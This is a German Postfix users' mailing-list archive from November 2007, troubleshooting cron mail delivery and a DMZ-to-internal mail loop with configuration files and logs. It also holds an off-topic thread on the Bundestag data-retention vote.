test) From nospam at thoma.cc Fri Nov 9 11:14:29 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Fri, 09 Nov 2007 11:14:29 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <4734300D.2050409@root2.schroederhost.de> References: <4734300D.2050409@root2.schroederhost.de> Message-ID: <47343305.5020006@thoma.cc> Sven Schmidt schrieb: > Hallo! > > Seid einiger Zeit bekomme ich keine Mails mehr von Cron, sonst alles ist ok. > > Hier meine Crontab: > > SHELL=/bin/bash > PATH=/sbin:/bin/:/usr/sbin/:/usr/bin > MAILTO=root > 0 1 * * * /usr/local/sbin/sync.sh > 0 23 * * * /usr/bin/dpkg --get-selections > /etc/packagelist && > /bin/chmod 0600 /etc/packagelist > */5 * * * * echo test > > > Das Cron.log: > > Nov 9 11:00:01 server /USR/SBIN/CRON[32176]: (root) CMD (echo test) > bekommst du überhaupt irgenwelche root mails ? hast du es mit /root/.forward oder mit /etc/aliases gemacht. ist in der alias ein verweis ala root: deine at mail.de drin? hast du postalias /etc/aliases schon gemacht und anschließend einen reload? gruß Maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From nospam at thoma.cc Fri Nov 9 11:16:46 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Fri, 09 Nov 2007 11:16:46 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <4734300D.2050409@root2.schroederhost.de> References: <4734300D.2050409@root2.schroederhost.de> Message-ID: <4734338E.20909@thoma.cc> Sven Schmidt schrieb: > Hallo! > > Seid einiger Zeit bekomme ich keine Mails mehr von Cron, sonst alles ist ok. > > Hier meine Crontab: > > SHELL=/bin/bash > PATH=/sbin:/bin/:/usr/sbin/:/usr/bin > MAILTO=root > 0 1 * * * /usr/local/sbin/sync.sh > 0 23 * * * /usr/bin/dpkg --get-selections > /etc/packagelist && > /bin/chmod 0600 /etc/packagelist > */5 * * * * echo test > > > Das Cron.log: > > Nov 9 11:00:01 server /USR/SBIN/CRON[32176]: (root) CMD (echo test) > wie siehts in deiner main.cf aus ? postconf -n ??? -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From sven at root2.schroederhost.de Fri Nov 9 11:52:33 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Fri, 09 Nov 2007 11:52:33 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <47343305.5020006@thoma.cc> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> Message-ID: <47343BF1.5090600@root2.schroederhost.de> Maximilian Thoma schrieb: > bekommst du überhaupt irgenwelche root mails ? > > hast du es mit /root/.forward oder mit /etc/aliases gemacht. > > ist in der alias ein verweis ala > > root: deine at mail.de drin? > > hast du postalias /etc/aliases schon gemacht und anschließend einen reload? > > > ja ich kann mir sogar selbst schreiben. ich hab mal eine externe Adrese in MAILTO eingetragen, das tut auch nichts. From nospam at thoma.cc Fri Nov 9 13:17:54 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Fri, 09 Nov 2007 13:17:54 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <47343BF1.5090600@root2.schroederhost.de> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> <47343BF1.5090600@root2.schroederhost.de> Message-ID: <47344FF2.2010709@thoma.cc> Sven Schmidt schrieb: > Maximilian Thoma schrieb: >> bekommst du überhaupt irgenwelche root mails ? >> >> hast du es mit /root/.forward oder mit /etc/aliases gemacht. >> >> ist in der alias ein verweis ala >> >> root: deine at mail.de drin? >> >> hast du postalias /etc/aliases schon gemacht und anschließend einen reload? >> >> >> > ja ich kann mir sogar selbst schreiben. > > ich hab mal eine externe Adrese in MAILTO eingetragen, das tut auch nichts. läuft dercron daemon überhaupt ? postconf -n wäre hilfreich und ein logauszug von der betreffenden zeit. -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From sven at root2.schroederhost.de Fri Nov 9 13:44:33 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Fri, 09 Nov 2007 13:44:33 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <47344FF2.2010709@thoma.cc> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> <47343BF1.5090600@root2.schroederhost.de> <47344FF2.2010709@thoma.cc> Message-ID: <47345631.1070703@root2.schroederhost.de> Maximilian Thoma schrieb: > läuft dercron daemon überhaupt ? postconf -n wäre hilfreich und ein > logauszug von der betreffenden zeit. > > alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases append_dot_mydomain = yes biff = no config_directory = /etc/postfix delay_warning_time = 4h inet_interfaces = loopback-only mailbox_command = procmail -a "$EXTENSION" mailbox_size_limit = 0 mydestination = dasix.domain.local, localhost, localhost.localdomain myhostname = dasix.domain.local mynetworks = 127.0.0.0/8 myorigin = /etc/mailname recipient_delimiter = + relayhost = smtp.xxxx.de smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) Ja der Cron läuft, siehe OP From r.felber at ek-muc.de Fri Nov 9 13:45:42 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Fri, 9 Nov 2007 13:45:42 +0100 Subject: [Postfixbuch-users] [OT] Live Bundestagsstream: Abstimmung VDS Message-ID: <20071109124542.GA79707@robtone.ek-muc.de> Sorry, fuers OT: http://www.vorratsdatenspeicherung.de/content/view/164/1/lang,de/ Links zu div live streams. (bei mir funktioniert phoenix + windows media am besten) -- Robert Felber (PGP: 896CF30B) Munich, Germany From peter.bauernfeind at reba-eno.de Fri Nov 9 13:56:42 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 13:56:42 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <47345631.1070703@root2.schroederhost.de> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> <47343BF1.5090600@root2.schroederhost.de> <47344FF2.2010709@thoma.cc> <47345631.1070703@root2.schroederhost.de> Message-ID: <4734590A.5040702@reba-eno.de> Sven Schmidt schrieb: > Maximilian Thoma schrieb: > >> läuft dercron daemon überhaupt ? postconf -n wäre hilfreich und ein >> logauszug von der betreffenden zeit. >> >> >> > alias_database = hash:/etc/aliases > alias_maps = hash:/etc/aliases > append_dot_mydomain = yes > biff = no > config_directory = /etc/postfix > delay_warning_time = 4h > inet_interfaces = loopback-only > Hier sagst du nur das loopback 127.0.0.1, also nix von außen > mailbox_command = procmail -a "$EXTENSION" > mailbox_size_limit = 0 > mydestination = dasix.domain.local, localhost, localhost.localdomain > Hier sagst du dasix.domain.local wäre deine Empfangs-Domäne > myhostname = dasix.domain.local > Hier sagst du aber dasix.domain.local wäre der Name deines Rechners -> beißt sich etwas mit oben > mynetworks = 127.0.0.0/8 > myorigin = /etc/mailname > recipient_delimiter = + > relayhost = smtp.xxxx.de > Und was willst du hier dann weiterleiten? > smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) > > Ja der Cron läuft, siehe OP > Und was steht in /etc/aliases und in /etc/postfix/transports? Mit freundlichem Gruß Peter Bauernfeind From mhaegele at linuxrocks.dyndns.org Fri Nov 9 14:01:46 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 09 Nov 2007 14:01:46 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mail_an_volle_Postf=E4cher_abl?= =?iso-8859-1?q?ehnen?= In-Reply-To: <47337B56.9030802@iunius.org> References: <47336C63.3090904@iunius.org> <47336E74.6070202@iunius.org> <1622810317.20071108213957@gmx.de> <47337642.2000800@iunius.org> <1246938072.20071108215427@gmx.de> <47337B56.9030802@iunius.org> Message-ID: <47345A3A.6030202@linuxrocks.dyndns.org> Andreas Krummrich schrieb: > Hmm, schade ;-) > > Gibt es vielleicht ne Möglichkeit da was am Postfix zu drehen? Am MDA? (In Peers Buch "POP3 und IMAP" wird sowas auf S. 177 ff beschrieben). Mit Cyrus kenne ich mich nicht aus, wird da Sieve verwendet? -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From sven at root2.schroederhost.de Fri Nov 9 14:27:21 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Fri, 09 Nov 2007 14:27:21 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <4734590A.5040702@reba-eno.de> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> <47343BF1.5090600@root2.schroederhost.de> <47344FF2.2010709@thoma.cc> <47345631.1070703@root2.schroederhost.de> <4734590A.5040702@reba-eno.de> Message-ID: <47346039.1080400@root2.schroederhost.de> Peter Bauernfeind schrieb: > > Hier sagst du nur das loopback 127.0.0.1, also nix von außen > > > Hier sagst du dasix.domain.local wäre deine Empfangs-Domäne > > Hier sagst du aber dasix.domain.local wäre der Name deines Rechners -> > beißt sich etwas mit oben > > Und was willst du hier dann weiterleiten? > > > Und was steht in /etc/aliases und in /etc/postfix/transports? > > Mit freundlichem Gruß > Peter Bauernfeind > > > > der soll ja im internet eine andresse erreichen. From peter.bauernfeind at reba-eno.de Fri Nov 9 14:34:26 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 14:34:26 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <47346039.1080400@root2.schroederhost.de> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> <47343BF1.5090600@root2.schroederhost.de> <47344FF2.2010709@thoma.cc> <47345631.1070703@root2.schroederhost.de> <4734590A.5040702@reba-eno.de> <47346039.1080400@root2.schroederhost.de> Message-ID: <473461E2.7080107@reba-eno.de> Sven Schmidt schrieb: > Peter Bauernfeind schrieb: > >> Hier sagst du nur das loopback 127.0.0.1, also nix von außen >> >> >> Hier sagst du dasix.domain.local wäre deine Empfangs-Domäne >> Nimm hier noch "dasix." vom Domänennamen weg. > der soll ja im internet eine andresse erreichen. > Dann solltes du dein postfix etwas weniger autistisch betreiben inet_interfaces = all Mit freundlichem Gruß Peter Bauernfeind From sven at root2.schroederhost.de Fri Nov 9 14:34:37 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Fri, 09 Nov 2007 14:34:37 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <47346039.1080400@root2.schroederhost.de> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> <47343BF1.5090600@root2.schroederhost.de> <47344FF2.2010709@thoma.cc> <47345631.1070703@root2.schroederhost.de> <4734590A.5040702@reba-eno.de> <47346039.1080400@root2.schroederhost.de> Message-ID: <473461ED.6050409@root2.schroederhost.de> Sven Schmidt schrieb: > Peter Bauernfeind schrieb: > >> Hier sagst du nur das loopback 127.0.0.1, also nix von außen >> >> >> Hier sagst du dasix.domain.local wäre deine Empfangs-Domäne >> >> Hier sagst du aber dasix.domain.local wäre der Name deines Rechners -> >> beißt sich etwas mit oben >> >> Und was willst du hier dann weiterleiten? >> >> >> Und was steht in /etc/aliases und in /etc/postfix/transports? >> >> Mit freundlichem Gruß >> Peter Bauernfeind >> >> >> >> >> > > der soll ja im internet eine andresse erreichen. > und das klappt auch mit dem Mailcommand. From mhaegele at linuxrocks.dyndns.org Fri Nov 9 14:38:28 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 09 Nov 2007 14:38:28 +0100 Subject: [Postfixbuch-users] [OT] Live Bundestagsstream: Abstimmung VDS In-Reply-To: <20071109124542.GA79707@robtone.ek-muc.de> References: <20071109124542.GA79707@robtone.ek-muc.de> Message-ID: <473462D4.3080407@linuxrocks.dyndns.org> Robert Felber schrieb: > Sorry, fuers OT: > > http://www.vorratsdatenspeicherung.de/content/view/164/1/lang,de/ > > Links zu div live streams. > > (bei mir funktioniert phoenix + windows media am besten) scnr: Da geh ich lieber nicht drauf die speichern meine IP!. -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From r.felber at ek-muc.de Fri Nov 9 14:40:45 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Fri, 9 Nov 2007 14:40:45 +0100 Subject: [Postfixbuch-users] [OT] Live Bundestagsstream: Abstimmung VDS In-Reply-To: <473462D4.3080407@linuxrocks.dyndns.org> References: <20071109124542.GA79707@robtone.ek-muc.de> <473462D4.3080407@linuxrocks.dyndns.org> Message-ID: <20071109134045.GA90863@robtone.ek-muc.de> On Fri, Nov 09, 2007 at 02:38:05PM +0100, Matthias Haegele wrote: > Robert Felber schrieb: > > Sorry, fuers OT: > > > > http://www.vorratsdatenspeicherung.de/content/view/164/1/lang,de/ > > > > Links zu div live streams. > > > > (bei mir funktioniert phoenix + windows media am besten) > > scnr: Da geh ich lieber nicht drauf die speichern meine IP!. He, komm, wer nichts zu befuerchten hat, hat nichts zu verbergen - o.ä. ;-) -- Robert Felber (PGP: 896CF30B) Munich, Germany From peter.bauernfeind at reba-eno.de Fri Nov 9 14:44:48 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 14:44:48 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <473461ED.6050409@root2.schroederhost.de> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> <47343BF1.5090600@root2.schroederhost.de> <47344FF2.2010709@thoma.cc> <47345631.1070703@root2.schroederhost.de> <4734590A.5040702@reba-eno.de> <47346039.1080400@root2.schroederhost.de> <473461ED.6050409@root2.schroederhost.de> Message-ID: <47346450.6040100@reba-eno.de> Sven Schmidt schrieb: > und das klappt auch mit dem Mailcommand. > > Welches Mailcommando meinst du? Und wer soll dir dann mailen? Welches Programm in cron? Wie sehen die Konfigurationsdateien dazu aus? Mit freundlichem Gruß Peter Bauernfeind From driessen at fblan.de Fri Nov 9 14:44:45 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 9 Nov 2007 14:44:45 +0100 Subject: [Postfixbuch-users] [OT] Live Bundestagsstream: Abstimmung VDS In-Reply-To: <473462D4.3080407@linuxrocks.dyndns.org> References: <20071109124542.GA79707@robtone.ek-muc.de> <473462D4.3080407@linuxrocks.dyndns.org> Message-ID: <000b01c822d6$b04ab190$0565a8c0@uwe> Matthias Haegele schrieb: > Robert Felber schrieb: > > Sorry, fuers OT: > > > > http://www.vorratsdatenspeicherung.de/content/view/164/1/lang,de/ > > > > Links zu div live streams. > > > > (bei mir funktioniert phoenix + windows media am besten) > > scnr: Da geh ich lieber nicht drauf die speichern meine IP!. *ggg deine IP habe ich auch schon gespeichert dann kommt es auf einen mehr oder weniger auch nicht mehr an > > > -- > Grüsse/Greetings > MH > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From new_zealand at gmx.de Fri Nov 9 14:47:14 2007 From: new_zealand at gmx.de (Tanja Moeser) Date: Fri, 09 Nov 2007 14:47:14 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?said=3A_554_5=2E4=2E0_Error?= =?iso-8859-15?q?=3A_too_many_hops_=28in_reply_to_end_of_DATA_command=29?= =?iso-8859-15?q?=29?= Message-ID: <334826866@web.de> Hallo da draussen, (sorry, wenn es etwas unübersichtlich wird in der Mail) ich habe leider ein Problem mit der Auslieferung der eMails an den internen Mailserver. Die Mails scheinen in einer Dauerschleife zwischen DMZ und internem LAN hin-und her zu wandern bis irgendwann Postfix "said: 554 5.4.0 Error: too many hops (in reply to end of DATA command))" meldet. Hier mal meine main.cf (DMZ-Rechner): smtpd_banner = mail.domain1.eu ESMTP biff = no debug_peer_level = 4 append_dot_mydomain = no transport_maps = hash:/etc/postfix/transport relay_recipient_maps = hash:/etc/postfix/relay_recipients myhostname = proxy.local alias_maps = hash:/etc/aliases alias_database = hash:/etc/aliases myorigin = domain1.eu mydestination = proxy.local, mail.local relayhost = relay_domains = domain1.eu, domain2.de defer_transports = mailbox_transport = mynetworks = 127.0.0.0/8, 192.168.1.0/24 mailbox_command = mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = all smtpd_sasl_local_domain = smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination masquerade_exceptions = root masquerade_classes = envelope_sender, header_sender, header_recipient program_directory = /usr/lib/postfix masquerade_domains = disable_dns_lookups = no default_transport = smtp soft_bounce = no content_filter = smtp-amavis:[127.0.0.1]:10024 master.cf: smtp inet n - n - - smtpd pickup fifo n - - 60 1 pickup cleanup unix n - - - 0 cleanup qmgr fifo n - n 300 1 qmgr tlsmgr unix - - - 1000? 1 tlsmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000? 0 flush proxymap unix - - n - - proxymap smtp unix - - - - - smtp # When relaying mail as backup MX, disable fallback_relay to avoid MX loops relay unix - - - - - smtp -o fallback_relay= showq unix n - - - - showq error unix - - - - - error discard unix - - - - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - - - - lmtp anvil unix - - - - 1 anvil scache unix - - - - 1 scache maildrop unix - n n - - pipe flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient} uucp unix - n n - - pipe flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient) ifmail unix - n n - - pipe flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient) bsmtp unix - n n - - pipe flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient scalemail-backend unix - n n - 2 pipe flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension} mailman unix - n n - - pipe flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py ${nexthop} ${user} smtp-amavis unix - - - - 2 smtp -o smtp_data_done_timeout=1200 -o disable_dns_lookups=yes 127.0.0.1:10025 inet n - - - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions= -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o strict_rfc821_envelopes=yes -o smtpd_recipient_restrictions=permit_mynetworks,reject -o smtpd_data_restrictions=reject_unauth_pipelining -o smtpd_end_of_data_restrictions= -o mynetworks=127.0.0.0/8 -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks main.cf (interner Mailserver): smtpd_banner = mail.domain1.eu ESMTP biff = no append_dot_mydomain = no inet_interface = all myhostname = mail.local mydestination = relayhost = [192.168.3.2] <---IP-DMZ mynetworks = 127.0.0.0/8, localhost, 192.168.3.2, 192.168.1.0/24, 192.168.2.0/24 smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_recipient_restrictions = permit_mynetworks, reject_unknown_recipient_domain, permit_sasl_authenticated, reject_unauth_destination mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all local_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf home_mailbox = /Maildir virtual_transport = virtual local_transport = virtual virtual_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf virtual_alias_maps = ldap:/etc/postfix/ldap_alias.cf virtual_mailbox_maps = ldap:/etc/postfix/ldap_dir.cf virtual_uid_maps = ldap:/etc/postfix/ldap_uid.cf virtual_gid_maps = ldap:/etc/postfix/ldap_gid.cf virtual_mailbox_domains= ldap:/etc/postfix/ldap_domain.cf virtual_mailbox_base = / virtual_minimum_uid = 500 virtual_mailbox_limit = 0 Das verschicken klappt (ausser das meine eigenen Mails als Spam beim Empfänger landen, aber andere Baustelle ;-) ). Das interne Mailing klappt auch. Hier noch der Auszug aus dem Log (der eingetnliche Eintrag ist elend lang) des DMZ-Rechners: Nov 9 14:22:28 proxy postfix/smtpd[4074]: connect from fmmailgate04.web.de[217.72.192.242] Nov 9 14:22:29 proxy postfix/smtpd[4074]: 0F39D41C2EF: client=fmmailgate04.web.de[217.72.192.242] Nov 9 14:22:29 proxy postfix/cleanup[4078]: 0F39D41C2EF: message-id=<334835252 at web.de> Nov 9 14:22:29 proxy postfix/qmgr[3781]: 0F39D41C2EF: from=, size=1328, nrcpt=1 (queue active) Nov 9 14:22:29 proxy postfix/smtpd[4074]: disconnect from fmmailgate04.web.de[217.72.192.242] Nov 9 14:22:32 proxy postfix/smtpd[4084]: connect from localhost[127.0.0.1] Nov 9 14:22:32 proxy postfix/smtpd[4084]: 7166A41C2F7: client=localhost[127.0.0.1] Nov 9 14:22:32 proxy postfix/cleanup[4078]: 7166A41C2F7: message-id=<334835252 at web.de> Nov 9 14:22:32 proxy postfix/smtpd[4084]: disconnect from localhost[127.0.0.1] Nov 9 14:22:32 proxy postfix/qmgr[3781]: 7166A41C2F7: from=, size=1768, nrcpt=1 (queue active) Nov 9 14:22:32 proxy amavis[4070]: (04070-01) Passed CLEAN, [87.139.125.198] -> , Message-ID: <334835252 at web.de>, mail_id: SaG4FBMYQwX6, Hits: 0.845, 3554 ms Nov 9 14:22:32 proxy postfix/smtp[4080]: 0F39D41C2EF: to=, relay=127.0.0.1[127.0.0.1]:10024, delay=3.6, delays=0.06/0.01/0.01/3.6, dsn=2.6.0, status=sent (250 2.6.0 Ok, id=04070-01, from MTA([127.0.0.1]:10025): 250 2.0.0 Ok: queued as 7166A41C2F7) Nov 9 14:22:32 proxy postfix/qmgr[3781]: 0F39D41C2EF: removed Nov 9 14:22:32 proxy postfix/smtp[4085]: 7166A41C2F7: to=, relay=192.168.1.7[192.168.1.7]:25, delay=0.44, delays=0.2/0.02/0.17/0.04, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 1A409D0054) Nov 9 14:22:32 proxy postfix/qmgr[3781]: 7166A41C2F7: removed Nov 9 14:22:32 proxy postfix/smtpd[4074]: connect from unknown[192.168.1.7] Nov 9 14:22:32 proxy postfix/smtpd[4074]: E17AD41C2EF: client=unknown[192.168.1.7] Nov 9 14:22:32 proxy postfix/cleanup[4078]: E17AD41C2EF: message-id=<334835252 at web.de> Nov 9 14:22:34 proxy postfix/qmgr[3781]: 2227C41C2F7: from=, size=5763, nrcpt=1 (queue active) Nov 9 14:22:34 proxy postfix/smtpd[4084]: disconnect from localhost[127.0.0.1] Nov 9 14:22:34 proxy amavis[4071]: (04071-03) Passed CLEAN, [87.139.125.198] -> , Message-ID: <334835252 at web.de>, mail_id: xl+GVvs1M9xc, Hits: 0.845, 160 ms Nov 9 14:22:34 proxy postfix/smtp[4080]: EF28541C2EF: to=, relay=127.0.0.1[127.0.0.1]:10024, delay=0.23, delays=0.07/0/0/0.16, dsn=2.6.0, status=sent (250 2.6.0 Ok, id=04071-03, from MTA([127.0.0.1]:10025): 250 2.0.0 Ok: queued as 2227C41C2F7) Nov 9 14:22:34 proxy postfix/qmgr[3781]: EF28541C2EF: removed Nov 9 14:22:34 proxy postfix/smtp[4085]: 2227C41C2F7: to=, relay=192.168.1.7[192.168.1.7]:25, delay=0.08, delays=0.06/0/0/0.02, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 67665D0054) Nov 9 14:22:34 proxy postfix/qmgr[3781]: 2227C41C2F7: removed Nov 9 14:22:35 proxy postfix/smtp[4085]: 7E1EE41C2F7: to=, relay=192.168.1.7[192.168.1.7]:25, delay=0.07, delays=0.06/0/0/0, dsn=5.4.0, status=bounced (host 192.168.1.7[192.168.1.7] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) Nov 9 14:22:35 proxy postfix/cleanup[4078]: 9C04541C2EF: message-id=<20071109132235.9C04541C2EF at proxy.local> Nov 9 14:22:35 proxy postfix/qmgr[3781]: 9C04541C2EF: from=<>, size=12396, nrcpt=1 (queue active) Nov 9 14:22:35 proxy postfix/bounce[4098]: 7E1EE41C2F7: sender non-delivery notification: 9C04541C2EF Nov 9 14:22:35 proxy postfix/qmgr[3781]: 7E1EE41C2F7: removed Nov 9 14:22:36 proxy postfix/smtp[4085]: 9C04541C2EF: to=, relay=mx0.gmx.de[213.165.64.100]:25, delay=0.54, delays=0.02/0/0.21/0.31, dsn=2.6.0, status=sent (250 2.6.0 Message accepted {mx026}) Nov 9 14:22:36 proxy postfix/qmgr[3781]: 9C04541C2EF: removed Ich habe hier auf der Liste im Archiv einen ähnlichen Eintrag entdeckt, da kam es aber zu keiner Lösung. Die Einträge von gmx und web.de hängen damit zusammen, dass mein privater gmx-account auf einen web.de-account (von dem aus ich diese Mail geschrieben habe) weitergeleitet werden. Vorab Danke und Gruß, Tanja ______________________________________________________________________ XXL-Speicher, PC-Virenschutz, Spartarife & mehr: Nur im WEB.DE Club! Jetzt testen! http://produkte.web.de/club/?mc=021130 From driessen at fblan.de Fri Nov 9 14:47:14 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 9 Nov 2007 14:47:14 +0100 Subject: [Postfixbuch-users] [OT] Live Bundestagsstream: Abstimmung VDS In-Reply-To: <473462D4.3080407@linuxrocks.dyndns.org> References: <20071109124542.GA79707@robtone.ek-muc.de> <473462D4.3080407@linuxrocks.dyndns.org> Message-ID: <000c01c822d7$0928a1f0$0565a8c0@uwe> Matthias Haegele schrieb: > scnr: Da geh ich lieber nicht drauf die speichern meine IP!. Achso habe ich vergessen zu sagen steht in jeder Mail drinne. Die Liste lässt alle Header unverändert. > > > -- > Grüsse/Greetings > MH > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From peter.bauernfeind at reba-eno.de Fri Nov 9 14:52:11 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 14:52:11 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <334826866@web.de> References: <334826866@web.de> Message-ID: <4734660B.8070108@reba-eno.de> Tanja Moeser schrieb:Kurz und bündig: Dein relayhost ist der interne Mailserver nicht der DMZ, der DMZ relay zum Relayhost (intern) Mit freundlichem Gruß Peter Bauernfeind From crandler at crandland.de Fri Nov 9 15:00:56 2007 From: crandler at crandland.de (crandler) Date: Fri, 9 Nov 2007 15:00:56 +0100 Subject: [Postfixbuch-users] [OT] Live Bundestagsstream: Abstimmung VDS In-Reply-To: <20071109124542.GA79707@robtone.ek-muc.de> Message-ID: <006301c822d8$f374fd70$2200a8c0@netclusive.local> > Sorry, fuers OT: > > http://www.vorratsdatenspeicherung.de/content/view/164/1/lang,de/ > > Links zu div live streams. > > (bei mir funktioniert phoenix + windows media am besten) Beschlossene Sache. http://www.heise.de/newsticker/meldung/98747 http://www.heute.de/ZDFheute/inhalt/1/0,3672,7122721,00.html From brutus at iunius.org Fri Nov 9 15:03:06 2007 From: brutus at iunius.org (Andreas Krummrich) Date: Fri, 09 Nov 2007 15:03:06 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mail_an_volle_Postf=E4cher_abl?= =?iso-8859-1?q?ehnen?= In-Reply-To: <47345A3A.6030202@linuxrocks.dyndns.org> References: <47336C63.3090904@iunius.org> <47336E74.6070202@iunius.org> <1622810317.20071108213957@gmx.de> <47337642.2000800@iunius.org> <1246938072.20071108215427@gmx.de> <47337B56.9030802@iunius.org> <47345A3A.6030202@linuxrocks.dyndns.org> Message-ID: <4734689A.2010206@iunius.org> Matthias Haegele schrieb: > Andreas Krummrich schrieb: > >> Hmm, schade ;-) >> >> Gibt es vielleicht ne Möglichkeit da was am Postfix zu drehen? >> > > Am MDA? > > > (In Peers Buch "POP3 und IMAP" wird sowas auf S. 177 ff beschrieben). > > Mit Cyrus kenne ich mich nicht aus, wird da Sieve verwendet? > > Ich kann dir leider nicht ganz folgen. Kannst du das etwas weiter ausführen? Gruß, Andreas From peter.bauernfeind at reba-eno.de Fri Nov 9 15:03:41 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 15:03:41 +0100 Subject: [Postfixbuch-users] [OT] Live Bundestagsstream: Abstimmung VDS In-Reply-To: <006301c822d8$f374fd70$2200a8c0@netclusive.local> References: <006301c822d8$f374fd70$2200a8c0@netclusive.local> Message-ID: <473468BD.7050907@reba-eno.de> crandler schrieb: >> Sorry, fuers OT: >> >> http://www.vorratsdatenspeicherung.de/content/view/164/1/lang,de/ >> >> Links zu div live streams. >> >> (bei mir funktioniert phoenix + windows media am besten) >> > > Beschlossene Sache. > > http://www.heise.de/newsticker/meldung/98747 > > http://www.heute.de/ZDFheute/inhalt/1/0,3672,7122721,00.html > > Hast du etwas anderes erwartet? Je je näher die Abstimmung rückt desto unwahrscheinlicher wird es, daß noch etwas geändert wird. Nicht nur hier sondern immer, auch mächtige Lobby-Gruppen beißen sich manchmal die Zähne aus. Es mag wohl ein paar Ausnahmen geben, sozusagen zur Beruhigung für das Stimmvi^Holk. Die letzte die mir im Gedächtnis ist, war gegen das Softwarepatent. 